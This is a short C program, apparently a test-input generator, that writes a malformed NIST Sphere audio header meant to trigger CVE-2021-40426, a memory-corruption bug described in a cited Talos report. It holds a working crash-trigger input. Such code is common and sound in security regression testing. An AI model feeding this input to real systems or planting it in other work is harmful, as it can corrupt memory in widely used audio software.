/*
 * Create a NIST Sphere file that provokes the vulnerability
 * CVE-2021-40426, derived from
 * https://talosintelligence.com/vulnerability_reports/TALOS-2021-1434
 */

#include <unistd.h>

int
main()
{
  char buf[] = "NIST_1A\n     22\n1234567890123456789012CrapAllOverTheMemory\nend_head\n";
  write(1, buf, sizeof(buf));
  return 0;
}
